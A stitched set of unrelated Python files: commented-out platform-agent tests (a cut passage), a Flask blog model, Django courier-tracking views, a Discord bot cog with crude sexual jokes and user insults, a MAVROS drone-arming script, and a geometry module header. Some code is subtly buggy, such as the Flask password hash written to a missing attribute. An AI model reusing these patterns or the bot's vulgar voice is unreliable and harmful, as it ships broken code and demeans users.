# #PlatformAgentEvent.PING_RESOURCE,
# #PlatformAgentEvent.GET_RESOURCE_CAPABILITIES,
# #PlatformAgentEvent.GET_RESOURCE_STATE,
# ]
#
# self.assertItemsEqual(agt_cmds, agt_cmds_stopped)
# self.assertItemsEqual(agt_pars, agt_pars_all)
# self.assertItemsEqual(res_cmds, [])
# #self.assertItemsEqual(res_pars, res_pars_all)
#
# verify_schema(retval)
#
# # back to COMMAND:
# self._resume()
#
# ##################################################################
# # MONITORING
# ##################################################################
# self._start_resource_monitoring()
#
# # Get exposed capabilities in current state.
# retval = self._pa_client.get_capabilities()
#
# # Validate capabilities of state MONITORING
# agt_cmds, agt_pars, res_cmds, res_iface, res_pars = sort_caps(retval)
#
# agt_cmds_monitoring = [
# PlatformAgentEvent.RESET,
# PlatformAgentEvent.SHUTDOWN,
#
# #PlatformAgentEvent.GET_RESOURCE_CAPABILITIES,
# #PlatformAgentEvent.PING_RESOURCE,
# #PlatformAgentEvent.GET_RESOURCE,
# #PlatformAgentEvent.SET_RESOURCE,
# #PlatformAgentEvent.EXECUTE_RESOURCE,
# #PlatformAgentEvent.GET_RESOURCE_STATE,
#
# PlatformAgentEvent.STOP_MONITORING,
#
# PlatformAgentEvent.RUN_MISSION,
#
# ]
#
# self.assertItemsEqual(agt_cmds, agt_cmds_monitoring)
# self.assertItemsEqual(agt_pars, agt_pars_all)
# self.assertItemsEqual(res_cmds, res_cmds_all)
# #self.assertItemsEqual(res_pars, res_pars_all)
#
# verify_schema(retval)
#
# # return to COMMAND state:
# self._stop_resource_monitoring()
#
#
# ###################
# # ALL CAPABILITIES
# ###################
#
# # Get exposed capabilities in all states as read from state COMMAND.
# retval = self._pa_client.get_capabilities(False)
#
# # Validate all capabilities as read from state COMMAND
# agt_cmds, agt_pars, res_cmds, res_iface, res_pars = sort_caps(retval)
#
# self.assertItemsEqual(agt_cmds, agt_cmds_all)
# self.assertItemsEqual(agt_pars, agt_pars_all)
# self.assertItemsEqual(res_cmds, res_cmds_all)
# #self.assertItemsEqual(res_pars, res_pars_all)
#
# verify_schema(retval)
#
# def test_some_state_transitions(self):
# self._create_network_and_start_root_platform(self._shutdown)
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
#
# self._initialize() # -> INACTIVE
# self._reset() # -> UNINITIALIZED
#
# self._initialize() # -> INACTIVE
# self._go_active() # -> IDLE
# self._reset() # -> UNINITIALIZED """
#
# self._initialize() # -> INACTIVE
# self._go_active() # -> IDLE
# self._run() # -> COMMAND
# self._pause() # -> STOPPED
# self._resume() # -> COMMAND
# self._clear() # -> IDLE
# self._reset() # -> UNINITIALIZED
#
# def test_get_set_resources(self):
# self._create_network_and_start_root_platform()
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
# self._ping_agent()
#
# self._initialize()
# self._go_active()
# self._run()
#
# self._get_resource()
# self._set_resource()
#
# def test_some_commands(self):
# self._create_network_and_start_root_platform()
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
# self._ping_agent()
#
# self._initialize()
# self._go_active()
# self._run()
#
# self._ping_agent()
# self._ping_resource()
#
# self._get_metadata()
# self._get_subplatform_ids()
#
# ports = self._get_ports()
# for port_id in ports:
# self._get_connected_instruments(port_id)
#
# def test_resource_monitoring(self):
# #
# # Basic test for resource monitoring: starts monitoring, waits for
# # a sample to be published, and stops resource monitoring.
# #
# self._create_network_and_start_root_platform()
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
# self._ping_agent()
#
# self._initialize()
# self._go_active()
# self._run()
#
# self._start_resource_monitoring()
# try:
# self._wait_for_a_data_sample()
# finally:
# self._stop_resource_monitoring()
#
# def test_resource_monitoring_recent(self):
# #
# # https://jira.oceanobservatories.org/tasks/browse/OOIION-1372
# #
# # Verifies that the requests for attribute values are always for
# # the most recent ones, meaning that the retrieved values should *not*
# # be older than a small multiple of the nominal monitoring rate, even
# # after a long period in non-monitoring state.
# # See ResourceMonitor._retrieve_attribute_values
# #
#
# # start this test as in test_resource_monitoring()
# self.test_resource_monitoring()
# # which completes right after stopping monitoring. We want that initial
# # start/stop-monitoring phase to make this test more comprehensive.
# self._assert_state(PlatformAgentState.COMMAND)
#
# # now, the rest of this test does the following:
# # - pick an attribute to use as a basis for the time parameters to
# # be used in the test
# # - wait for a while in the current non-monitoring mode
# # - re-enable monitoring
# # - wait for a sample to be published
# # - verify that new received data sample is "recent"
# # - stop monitoring
#
# # first, use an attribute (from the root platform being tested) with
# # a minimal monitoring rate, since that attribute should be reported
# # in a first sample received after re-enabling the monitoring.
# attr = None
# for attr_id, plat_attr in self._platform_attributes[self.PLATFORM_ID].iteritems():
# if attr is None or \
# float(plat_attr['monitor_cycle_seconds']) < float(attr['monitor_cycle_seconds']):
# attr = plat_attr
#
# self.assertIsNotNone(attr,
# "some attribute expected to be defined for %r to "
# "actually proceed with this test" % self.PLATFORM_ID)
#
# attr_id = attr['attr_id']
# monitor_cycle_seconds = attr['monitor_cycle_seconds']
# log.info("test_resource_monitoring_recent: using attr_id=%r: monitor_cycle_seconds=%s",
# attr_id, monitor_cycle_seconds)
#
# # sleep for twice the interval defining "recent":
# from ion.agents.platform.resource_monitor import _MULT_INTERVAL
# time_to_sleep = 2 * (_MULT_INTERVAL * monitor_cycle_seconds)
# log.info("test_resource_monitoring_recent: sleeping for %s secs "
# "before resuming monitoring", time_to_sleep)
# sleep(time_to_sleep)
#
# # reset the variables associated with the _wait_for_a_data_sample call below:
# self._samples_received = []
# self._async_data_result = AsyncResult()
#
# #################################################
# # re-start monitoring and wait for new sample:
# log.info("test_resource_monitoring_recent: re-starting monitoring")
# self._start_resource_monitoring(recursion=False)
# # should also work with recursion to children but set recursion=False
# # to avoid wasting the extra time in this test.
#
# try:
# self._wait_for_a_data_sample()
#
# # get current time here (right after receiving sample) for comparison below:
# curr_time_millis = current_time_millis()
#
# # verify that the timestamp of the received sample is not too old.
# # For this, use the minimum of the reported timestamps:
# rdt = RecordDictionaryTool.load_from_granule(self._samples_received[0])
# log.trace("test_resource_monitoring_recent: rdt:\n%s", rdt.pretty_print())
# temporal_parameter_name = rdt.temporal_parameter
# times = rdt[temporal_parameter_name]
# log.trace("test_resource_monitoring_recent: times:\n%s", self._pp.pformat(times))
#
# # minimum reported timestamp (note the NTP -> ION_time conversion):
# min_reported_time_ntp = min(times)
# min_reported_time_millis = float(ntp_2_ion_ts(min_reported_time_ntp))
# log.info("test_resource_monitoring_recent: sample received, min_reported_time_millis=%s",
# int(min_reported_time_millis))
#
# # finally verify that it is actually not older than the small multiple
# # of monitor_cycle_seconds plus some additional tolerance (which is
# # arbitrarily set here to 10 secs):
# lower_limit_millis = \
# curr_time_millis - 1000 * (_MULT_INTERVAL * monitor_cycle_seconds + 10)
#
# self.assertGreaterEqual(
# min_reported_time_millis, lower_limit_millis,
# "min_reported_time_millis=%s must be >= %s. Diff=%s millis" % (
# min_reported_time_millis, lower_limit_millis,
# min_reported_time_millis - lower_limit_millis))
#
# finally:
# self._stop_resource_monitoring(recursion=False)
#
# def test_external_event_dispatch(self):
# self._create_network_and_start_root_platform()
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
# self._ping_agent()
#
# self._initialize()
#
# # according to process_oms_event() (in service_gateway_service.py)
# # https://github.com/ooici/coi-services/blob/999c4315259082a9e50d6f4f96f8dd606073fda8/ion/services/coi/service_gateway_service.py#L339-370
# async_event_result, events_received = self._start_event_subscriber2(
# count=1,
# event_type="OMSDeviceStatusEvent",
# origin_type='OMS Platform'
# )
#
# self._go_active()
# self._run()
#
# # verify reception of the external event:
# log.info("waiting for external event notification... (timeout=%s)", self._receive_timeout)
# async_event_result.get(timeout=self._receive_timeout)
# self.assertEquals(len(events_received), 1)
# log.info("external events received: (%d): %s", len(events_received), events_received)
#
# def test_connect_disconnect_instrument(self):
# self._create_network_and_start_root_platform()
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
# self._ping_agent()
#
# self._initialize()
# self._go_active()
# self._run()
#
# self._connect_instrument()
# self._turn_on_port()
#
# self._turn_off_port()
# self._disconnect_instrument()
#
# def test_check_sync(self):
# self._create_network_and_start_root_platform()
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
# self._ping_agent()
#
# self._initialize()
# self._go_active()
# self._run()
#
# self._check_sync()
#
# self._connect_instrument()
# self._check_sync()
#
# self._disconnect_instrument()
# self._check_sync()
#
# def test_execute_resource(self):
# self._create_network_and_start_root_platform()
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
#
# self._initialize()
# self._go_active()
# self._run()
#
# self._execute_resource(RSNPlatformDriverEvent.CHECK_SYNC)
#
# def test_resource_states(self):
# self._create_network_and_start_root_platform(self._shutdown)
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
#
# with self.assertRaises(Conflict):
# self._pa_client.get_resource_state()
#
# self._initialize()
#
# self._start_event_subscriber(event_type="ResourceAgentResourceStateEvent",
# count=2)
#
# res_state = self._pa_client.get_resource_state()
# self.assertEqual(res_state, RSNPlatformDriverState.DISCONNECTED)
#
# self._go_active()
#
# res_state = self._pa_client.get_resource_state()
# self.assertEqual(res_state, RSNPlatformDriverState.CONNECTED)
#
# self._run()
#
# res_state = self._pa_client.get_resource_state()
# self.assertEqual(res_state, RSNPlatformDriverState.CONNECTED)
#
# self._go_inactive()
#
# res_state = self._pa_client.get_resource_state()
# self.assertEqual(res_state, RSNPlatformDriverState.DISCONNECTED)
#
# self._reset()
#
# with self.assertRaises(Conflict):
# self._pa_client.get_resource_state()
#
# self._async_event_result.get(timeout=self._receive_timeout)
# self.assertGreaterEqual(len(self._events_received), 2)
#
# def test_lost_connection_and_reconnect(self):
# #
# # Starts up the network and puts the root platform in the MONITORING
# # state; then makes the simulator generate synthetic exceptions for
# # any call, which are handled by the driver as "connection lost"
# # situations; then it verifies the publication of the associated event
# # from the agent, and the LOST_CONNECTION state for the agent.
# # Finally, it instructs the simulator to resume working normally,
# # which should make the reconnect logic in the agent to recover the
# # connection and go back to the state where it was at connection lost.
# #
#
# ######################################################
# # set up network and put root in MONITORING state
#
# self._create_network_and_start_root_platform()
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
# self._initialize()
#
# async_event_result, events_received = self._start_event_subscriber2(
# count=1,
# event_type="ResourceAgentConnectionLostErrorEvent",
# origin=self.p_root.platform_device_id)
#
# self._go_active()
# self._run()
#
# self._start_resource_monitoring()
#
# # let normal activity go on for a while:
# sleep(15)
#
# ######################################################
# # disable simulator to trigger lost connection:
# log.debug("disabling simulator")
# self._simulator_disable()
#
# # verify a ResourceAgentConnectionLostErrorEvent was published:
# async_event_result.get(timeout=self._receive_timeout)
# self.assertEquals(len(events_received), 1)
#
# # verify the platform is now in LOST_CONNECTION:
# self._assert_state(PlatformAgentState.LOST_CONNECTION)
#
# ######################################################
# # reconnect phase
#
# # re-enable simulator so connection is re-established:
# log.debug("re-enabling simulator")
# self._simulator_enable()
#
# # wait for a bit for the reconnection to take effect:
# sleep(15)
#
# # verify the platform is now back in MONITORING
# self._assert_state(PlatformAgentState.MONITORING)
#
# self._stop_resource_monitoring()
#
# def test_alerts(self):
# #
# # Tests alert processing/publication from the platform agent. Both
# # alert definitions passed via configuration and alert definitions
# # passed via the agent's set_agent({'alerts' : alert_defs}) method
# # are tested.
# #
#
# def start_DeviceStatusAlertEvent_subscriber(value_id, sub_type):
# """
# @return async_event_result Use it to wait for the expected event
# """
# event_type = "DeviceStatusAlertEvent"
#
# async_event_result = AsyncResult()
#
# def consume_event(evt, *args, **kwargs):
# log.info('DeviceStatusAlertEvent_subscriber received evt: %s', str(evt))
# if evt.type_ != event_type or \
# evt.value_id != value_id or \
# evt.sub_type != sub_type:
# return
#
# async_event_result.set(evt)
#
# kwargs = dict(event_type=event_type,
# callback=consume_event,
# origin=self.p_root.platform_device_id,
# sub_type=sub_type)
#
# sub = EventSubscriber(**kwargs)
# sub.start()
# log.info("registered DeviceStatusAlertEvent subscriber: %s", kwargs)
#
# self._event_subscribers.append(sub)
# sub._ready_event.wait(timeout=self._receive_timeout)
#
# return async_event_result
#
# # before the creation of the network, set some alert defs for the
# # configuration of the root platform we are testing:
# alerts_for_config = [
# {
# 'name' : 'input_bus_current_warning_interval',
# 'stream_name' : 'parsed',
# 'value_id' : 'input_bus_current',
# 'description' : 'input_bus_current is above normal range.',
# 'alert_type' : StreamAlertType.WARNING,
# 'aggregate_type' : AggregateStatusType.AGGREGATE_DATA,
# 'lower_bound' : None,
# 'lower_rel_op' : None,
# 'upper_bound' : 200.0,
# 'upper_rel_op' : '<',
# 'alert_class' : 'IntervalAlert'
# }]
# self._set_additional_extra_fields_for_platform_configuration(
# self.PLATFORM_ID, {'alerts': alerts_for_config})
#
# self._create_network_and_start_root_platform()
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
# self._ping_agent()
#
# self._initialize()
#
# # verify we get reported the configured alerts:
# configed_alerts = self._pa_client.get_agent(['alerts'])['alerts']
# self.assertEquals(len(alerts_for_config), len(configed_alerts),
# "must have %d alerts defined from configuration but got %d" % (
# len(alerts_for_config), len(configed_alerts)))
#
# # define some additional alerts:
# # NOTE: see ion/agents/platform/rsn/simulator/oms_values.py for the
# # sinusoidal waveforms that are generated; here we depend on those
# # ranges to indicate the upper_bounds for these alarms; for example,
# # input_voltage fluctuates within -500.0 to +500, so we specify
# # upper_bound = 400.0 to see the alert being published.
# new_alert_defs = [
# {
# 'name' : 'input_voltage_warning_interval',
# 'stream_name' : 'parsed',
# 'value_id' : 'input_voltage',
# 'description' : 'input_voltage is above normal range.',
# 'alert_type' : StreamAlertType.WARNING,
# 'aggregate_type' : AggregateStatusType.AGGREGATE_DATA,
# 'lower_bound' : None,
# 'lower_rel_op' : None,
# 'upper_bound' : 400.0,
# 'upper_rel_op' : '<',
# 'alert_class' : 'IntervalAlert'
# }]
#
# # All the alerts to be set: the configured ones plus the new ones above:
# alert_defs = configed_alerts + new_alert_defs
#
# self._pa_client.set_agent({'alerts' : alert_defs})
#
# retval = self._pa_client.get_agent(['alerts'])['alerts']
# log.debug('alerts: %s', self._pp.pformat(retval))
# self.assertEquals(len(alert_defs), len(retval),
# "must have %d alerts defined here but got %d" % (
# len(alert_defs), len(retval)))
#
# self._go_active()
# self._run()
#
# #################################################################
# # prepare to receive alert publications:
# # note: as the values for the above streams fluctuate we should get
# # both WARNING and ALL_CLEAR events:
#
# # NOTE that the verifications below are for both the configured
# # alerts and the additional alerts set via set_agent.
#
# async_event_result1 = start_DeviceStatusAlertEvent_subscriber(
# value_id="input_voltage",
# sub_type=StreamAlertType._str_map[StreamAlertType.WARNING])
#
# async_event_result2 = start_DeviceStatusAlertEvent_subscriber(
# value_id="input_bus_current",
# sub_type=StreamAlertType._str_map[StreamAlertType.WARNING])
#
# async_event_result3 = start_DeviceStatusAlertEvent_subscriber(
# value_id="input_voltage",
# sub_type=StreamAlertType._str_map[StreamAlertType.ALL_CLEAR])
#
# async_event_result4 = start_DeviceStatusAlertEvent_subscriber(
# value_id="input_bus_current",
# sub_type=StreamAlertType._str_map[StreamAlertType.ALL_CLEAR])
#
# self._start_resource_monitoring()
#
# # wait for the expected DeviceStatusAlertEvent events:
# # (60sec timeout enough for the sine periods associated to the streams)
# async_event_result1.get(timeout=60)
# async_event_result2.get(timeout=60)
# async_event_result3.get(timeout=60)
# async_event_result4.get(timeout=60)
#
# self._stop_resource_monitoring()
|
from . import db
from werkzeug.security import generate_password_hash,check_password_hash
from flask_login import UserMixin
from . import login_manager
from datetime import datetime
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class User(UserMixin,db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer,primary_key = True)
username = db.Column(db.String(255),index = True)
email = db.Column(db.String(255),unique = True,index = True)
role_id = db.Column(db.Integer,db.ForeignKey('roles.id'))
bio = db.Column(db.String(255))
profile_pic_path = db.Column(db.String())
password_secure = db.Column(db.String(255))
idea = db.relationship('Comments', backref='author', lazy='dynamic')
def __repr__(self):
return f'User {self.username}'
@property
def password(self):
raise AttributeError('You cannot read the password attribute')
@password.setter
def password(self, password):
self.pass_secure = generate_password_hash(password)
def verify_password(self,password):
return check_password_hash(self.pass_secure,password)
def __repr__(self):
return f'User {self.username}'
class Blog(UserMixin,db.Model):
__tablename__ = 'blogs'
id = db.Column(db.Integer,primary_key = True)
blog_name = db.Column(db.String(255),index = True)
# blog_email = db.Column(db.String(255),unique = True,index = True)
role_id = db.Column(db.Integer,db.ForeignKey('roles.id'))
description = db.Column(db.String(255), index=True)
idea_title = db.Column(db.String(255), index=True)
# bio = db.Column(db.String(255))
# profile_pic_path = db.Column(db.String())
# blog_pass_secure = db.Column(db.String(255))
# @property
# def password(self):
# raise AttributeError('You cannot read the password attribute')
# @password.setter
# def password(self, password):
# self.blog_pass_secure = generate_password_hash(password)
# def verify_password(self,password):
# return check_password_hash(self.blog_pass_secure,password)
def __repr__(self):
return f'User {self.username}'
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer,primary_key = True)
name = db.Column(db.String(255))
users = db.relationship('User',backref = 'role',lazy="dynamic")
def __repr__(self):
return f'User {self.name}'
class Comments(db.Model):
__tablename__ = 'comments'
id = db.Column(db.Integer,primary_key = True)
comment = db.Column(db.String(255))
idea_id = db.Column(db.Integer, db.ForeignKey("idea.id"))
date = db.Column(db.DateTime(250), default=datetime.utcnow)
user_id = db.Column(db.Integer,db.ForeignKey("users.id"))
def save_comment(self):
db.session.add(self)
db.session.commit()
@classmethod
def get_comment(cls,id):
comments = Comments.query.filter_by(idea_id=id).all()
return comments
def delete(self):
db.session.delete(self)
db.session.commit()
def __repr__(self):
return f"Comments('{self.comment}', '{self.date}')"
class Idea(db.Model):
__tablename__= 'idea'
id = db.Column(db.Integer,primary_key = True)
title = db.Column(db.String(255))
description = db.Column(db.String(255))
idea = db.Column(db.String(255))
date = db.Column(db.DateTime(250), default=datetime.utcnow)
user_id = db.Column(db.Integer, db.ForeignKey("users.id"))
comments = db.relationship('Comments', backref='title', lazy='dynamic')
def save_idea(self):
db.session.add(self)
db.session.commit()
@classmethod
def get_idea(cls,cate):
idea = idea.query.filter_by(category=cate).all()
return idea
@classmethod
def get_all_idea(cls):
idea = Idea.query.order_by('-id').all()
return idea
def __repr__(self):
return f'Posts {self._title}'
|
from django.http.response import HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from datetime import datetime
from django.contrib import messages
from django.shortcuts import get_object_or_404, redirect, render
from django.views import generic
from .models import Post
from .forms import NewCourier,UpdateCourier,HandOverForm
from django.contrib.admin.views.decorators import staff_member_required
from DispatchAPI.models import EmailMapping, MobileNumberMapping
from django.core.mail import send_mail
'''
Main view
'''
class Home(generic.base.TemplateView):
template_name='index.html'
'''
Search View for a courier
'''
class SearchCourier(generic.ListView):
queryset=Post.objects.order_by('-Received_On')
template_name='search_courier.html'
'''
Specific view of a post
'''
class PostSpecific(generic.DetailView):
model=Post
template_name='post_specific.html'
'''
Adds new courier
'''
@login_required
@staff_member_required
def AddCourier(request):
if request.method=="POST":
form=NewCourier(request.POST or None)
if form.is_valid():
form.save()
current=Post.objects.filter(
PODnumber=form.cleaned_data['PODnumber'],
StudentName=form.cleaned_data['StudentName'],
FromName=form.cleaned_data['FromName'],
Email=form.cleaned_data['Email'],
RollNumber=form.cleaned_data['RollNumber'],
Mobile=form.cleaned_data['Mobile'],
OtherInformation=form.cleaned_data['OtherInformation'],
)[0]
messages.add_message(request,messages.INFO,current.getCourierId())
#CurrentDT=datetime.now().strftime("%B %d, %Y")+" at "+datetime.now().strftime("%H:%M:%S")
#DiscordWebhook.Notify(current.getCourierId(),current.getFromName(),current.getStudentName(),current.getRollNumber(),current.getEmail(),current.getMobile(),CurrentDT,current.getOtherInfo(),False)
notified=False
email=current.getEmail()
mobile=current.getMobile()
if email:
possibilities=EmailMapping.objects.filter(ParentMail__iexact=email)
if possibilities.count()>0:
notified=True
#send_mail(current)
print(f"Send mail to {email}")
else:
possibilities=EmailMapping.objects.filter(ChildMail__iexact=email)
if possibilities:
for possiblity in possibilities:
if possiblity.Verified:
notified=True
#send_mail(possiblity)
print(f"Sent mail to {possiblity.ParentMail}")
if not notified and mobile:
possibilities=MobileNumberMapping.objects.filter(ChildNumber__iexact=mobile)
if possibilities:
for possiblity in possibilities:
if possiblity.Verified:
notified=True
#send_mail(possiblity)
print(f"Sent mail to {possiblity.ParentMail}")
form.cleaned_data['Notified']=notified
form.save()
messages.success(request,"Courier has been added successfully!")
if notified:
messages.success(request,"Sent notification successfully!")
else:
messages.warning(request,"Couldn't send notification.")
return HttpResponseRedirect('/')
return render(request,"add_courier.html",{})
else:
form=NewCourier()
return render(request,'add_courier.html',{'form':form})
'''
Allows admins to edit courier details
'''
@login_required
@staff_member_required
def EditCourier(request,pk,*args,**kwargs):
CourierObj=get_object_or_404(Post,pk=pk)
if request.method=='POST':
UpdatedPost=UpdateCourier(request.POST,instance=CourierObj)
if UpdatedPost.is_valid():
UpdatedPost.save()
messages.success(request,"Courier has been updated successfully!")
messages.warning(request,"Changes are NOT notified.")
return redirect('search')
else:
UpdatedPost=UpdateCourier(instance=CourierObj)
return render(request,"edit_courier.html",{"original_post":CourierObj,"updated_post":UpdatedPost})
'''
Marks courier as received by student
'''
@login_required
@staff_member_required
def HandOver(request,pk,*args,**kwargs):
ExistingObj=get_object_or_404(Post,pk=pk)
if request.method=='POST':
UpdatedObj=HandOverForm(request.POST,instance=ExistingObj)
if UpdatedObj.is_valid():
ExistingObj.Collected=True
ExistingObj.Collected_On=datetime.now()
UpdatedObj.save()
messages.success(request,"Courier has been updated successfully!")
return redirect('home')
else:
UpdatedObj=HandOverForm(instance=ExistingObj)
return render(request,"hand_over.html",{"existing_post":ExistingObj,"updated_post":UpdatedObj})
'''
Deletes a Courier
'''
@login_required
@staff_member_required
def DeleteCourier(request,pk=None):
post=Post.objects.get(CourierId=pk)
post.delete()
messages.success(request,"Courier has been deleted successfully!")
return HttpResponseRedirect('/search')
|
import discord
from discord.ext import commands
import random
import re
class Fun:
def __init__(self, client):
self.client = client
# Say message then delete author message
@commands.command(pass_context=True, no_pm=True)
async def say(self, ctx, *, words):
await self.client.delete_message(ctx.message)
await self.client.say(words)
# Random dick size
@commands.command(pass_context=True)
async def dick(self, ctx):
author = ctx.message.author
size = random.randint(1, 15)
# Make dick
output = '8'
for i in range(size):
output += '='
output += 'D'
# Hard or soft
list = ['hard :eggplant:', 'soft :banana:']
flaccidity = random.choice(list)
await self.client.say("**{0.mention}** has a ".format(author) + str(size) + " inch dick " + flaccidity + " " + output)
# Where you from? IM THE FROM THE 6IX YOU WASTEYUTE
@commands.command(pass_context=True)
async def wasteman(self, ctx):
author = ctx.message.author
salutations = ["yo", "ay"]
people = ["shordy", "wasteyute", "ahlie", "cyattie", "gyal", "mandem", "ting", "mans", "bean", "fam", "sweetermenz", "bucktee", "my g", "kawhi", "danaya"]
adjectives = ["bare", "mad", "bad", "bored", "cheesed", "dry"]
phrases = ["nyeahhhh", "don't cheese me", "that's wild", "i like nav", "drake can suck my cock", "scoop me", "copped", "hooooly", "flex", "lowe it", "that's beat", "mans are marved"]
sentences = [f"{random.choice(salutations)} {author.mention}, you're such a {random.choice(adjectives)} {random.choice(people)}",
f"{random.choice(people)} {random.choice(phrases)} yo",
f"{random.choice(salutations)}, {random.choice(phrases)} {random.choice(people)}, {random.choice(phrases)}",
f"{random.choice(phrases)}, why am i such a {random.choice(adjectives)} {random.choice(people)} its crazy {random.choice(people)}",
f"{random.choice(phrases)} i'm {random.choice(adjectives)} fam",
f"{random.choice(phrases)} {random.choice(phrases)} {random.choice(salutations)}"]
await self.client.say(random.choice(sentences))
# Rock Paper Scissors 1 == Rock 2 == Paper 3 = Scissors
@commands.command(pass_context=True)
async def rps(self, ctx):
aiChoice = 0
playerChoice = 0
author = ctx.message.author
bot = self.client.user.name
# Check for emojis
def check(reaction, author):
e = str(reaction.emoji)
return e.startswith(('🗿', '📄', '✂'))
# AI choice
aiChoice = random.randint(1, 3)
choiceList = {1: '🗿', 2: '📄', 3: '✂'}
# Create embedded message
embed = discord.Embed(description = "Choose rock 🗿, paper 📄, or scissors ✂!", colour = discord.Colour.darker_grey())
embed.set_footer(text=bot+' by ian#4359')
embed.set_author(name="Rock Paper Scissors")
# Initial message
msg = await self.client.say(embed=embed)
for emoji in choiceList:
await self.client.add_reaction(msg, choiceList[emoji])
# Wait for choice
choice = await self.client.wait_for_reaction(message=msg, check=check, user=author)
#Player choice
if ("{0.emoji}".format(choice.reaction)) == "🗿": playerChoice = 1
if ("{0.emoji}".format(choice.reaction)) == "📄": playerChoice = 2
if ("{0.emoji}".format(choice.reaction)) == "✂": playerChoice = 3
# Check for win
if playerChoice is 1 and aiChoice is 3 or playerChoice is 2 and aiChoice is 1 or playerChoice is 3 and aiChoice is 2:
embed = discord.Embed(description="{0} beats {1}".format(choiceList[playerChoice], choiceList[aiChoice]), colour = discord.Colour.green())
embed.set_footer(text=bot+' by ian#4359')
embed.set_author(name="{0.name} Wins".format(author).title())
await self.client.edit_message(msg, embed=embed)
# Tie
elif playerChoice == aiChoice:
embed = discord.Embed(description="You both chose {0}".format(choiceList[playerChoice]), colour = discord.Colour.blue())
embed.set_footer(text=bot+' by ian#4359')
embed.set_author(name="{0.name} Tied".format(author).title())
await self.client.edit_message(msg, embed=embed)
# Player loses
else:
embed = discord.Embed(description="{0} beats {1}".format(choiceList[aiChoice], choiceList[playerChoice]), colour = discord.Colour.red())
embed.set_footer(text=bot+' by ian#4359')
embed.set_author(name="{0.name} Loses".format(author).title())
await self.client.edit_message(msg, embed=embed)
# Coin flipper
@commands.command(pass_context=True)
async def coin(self, ctx):
author = ctx.message.author
bot = self.client.user.name
# Coin variables
coins = {1: '🔴', 2:'🔵'}
aiChoice = random.randint(1, 2)
# Create embed
embed = discord.Embed(description = "Heads 🔴 or tails 🔵?", colour = discord.Colour.darker_grey())
embed.set_footer(text=bot+' by ian#4359')
embed.set_author(name="Coin Toss")
# Send initial message
msg = await self.client.say(embed=embed)
for emoji in coins:
await self.client.add_reaction(msg, coins[emoji])
# Check for emojis
def check(reaction, author):
e = str(reaction.emoji)
return e.startswith(('🔴', '🔵'))
# Wait for player choice
choice = await self.client.wait_for_reaction(message=msg, check=check, user=author)
if ("{0.emoji}".format(choice.reaction)) == "🔴": playerChoice = 1
if ("{0.emoji}".format(choice.reaction)) == "🔵": playerChoice = 2
# Guessed right
if playerChoice is 1 and aiChoice is 1 or playerChoice is 2 and aiChoice is 2:
embed = discord.Embed(description = "Lucky ass rng, you're right, it's {0}".format(coins[playerChoice]), colour = discord.Colour.green())
embed.set_footer(text=bot+' by ian#4359')
embed.set_author(name="You won!")
await self.client.edit_message(msg, embed=embed)
# Guessed wrong
else:
embed = discord.Embed(description = "lol nice rng idiot, you lost, it's {0}".format(coins[aiChoice]), colour = discord.Colour.red())
embed.set_footer(text=bot+' by ian#4359')
embed.set_author(name="You lost..")
await self.client.edit_message(msg, embed=embed)
# Random number generator
@commands.command(pass_context=True)
async def random(self, ctx, *, rangeOfNumbers):
try:
rangeOfNumbers = rangeOfNumbers.strip()
# Parse rangeOfNumbers into array
numbers = re.split(r"\s|-|-\s", rangeOfNumbers)
# Between 2 given numbers (E.g. 50-100)
if(len(numbers) == 2):
left = int(numbers[0])
right = int(numbers[1])
if left > right:
await self.client.say(f"Number generated from ({right}-{left}): **{random.randint(right, left):0{len(str(left))}d}**")
else:
await self.client.say(f"Number generated from ({left}-{right}): **{random.randint(left, right):0{len(str(right))}d}**")
# Between 0 and rangeOfNumbers (E.g. 0-10)
elif(len(numbers) == 1):
await self.client.say(f"Number generated from (0-{rangeOfNumbers}): **{random.randint(0, int(rangeOfNumbers)):0{len(str(rangeOfNumbers))}d}**")
# Too much arguments
else:
await self.client.say("Too many arguments :confused: ")
except ValueError:
await self.client.say("Has to be a number Bobby.")
def setup(client):
client.add_cog(Fun(client))
|
#!/usr/bin/env python
import rospy
from mavros_msgs.msg import State
from mavros_msgs.srv import CommandBool, SetMode
from geometry_msgs.msg import Pose, PoseStamped, Point, Quaternion
import math
import numpy
from geometry_msgs.msg import Twist
from std_msgs.msg import Header
from threading import Thread
x=1
print x
def start1():
global x
rate = rospy.Rate(20) # Hz
if x==1:
print "Arming"
result = arming_srv(value=True)
print result
print "Setting Offboard Mode"
result = mode_srv(custom_mode="OFFBOARD")
print result
x=0
print "position_set"
while not rospy.is_shutdown():
print "Setting Offboard Mode"
result = mode_srv(custom_mode="OFFBOARD")
print result
x=0
pos=set_p()
pos.header.stamp = rospy.Time.now()
vel_pub.publish(pos)
try:
rate.sleep()
except rospy.ROSInterruptException:
pass
def state_cb(msg):
print msg
def set_p():
pos=PoseStamped()
pos.header = Header()
#enter position for the drone
pos.pose.position.x=0
pos.pose.position.y=0
pos.pose.position.z=5.0
return pos
if __name__ == '__main__':
rospy.init_node('subnode', anonymous=True)
vel_pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped,queue_size=1)
arming_srv = rospy.ServiceProxy("/mavros/cmd/arming", CommandBool)
mode_srv = rospy.ServiceProxy("/mavros/set_mode", SetMode)
start1()
pos_thread = Thread(target=start1, args=())
pos_thread.daemon = True
pos_thread.start()
state_sub = rospy.Subscriber('/mavros/state', State, callback=state_cb)
|
from abc import ABC, abstractmethod
import logging
from logging import Logger
from pathlib import Path
import socket
from typing import Any, Generator, Mapping, Sequence, Union
from pyproj import CRS
from shapely.geometry import LinearRing, MultiPolygon, Polygon
from shapely.geometry.base import BaseGeometry, GEOMETRY_TYPES
from tablecrow.utilities import convert_value, get_logger, parse_hostname
DEFAULT_CRS = CRS.from_epsg(4326)
class TableNotFoundError(FileNotFoundError):
pass
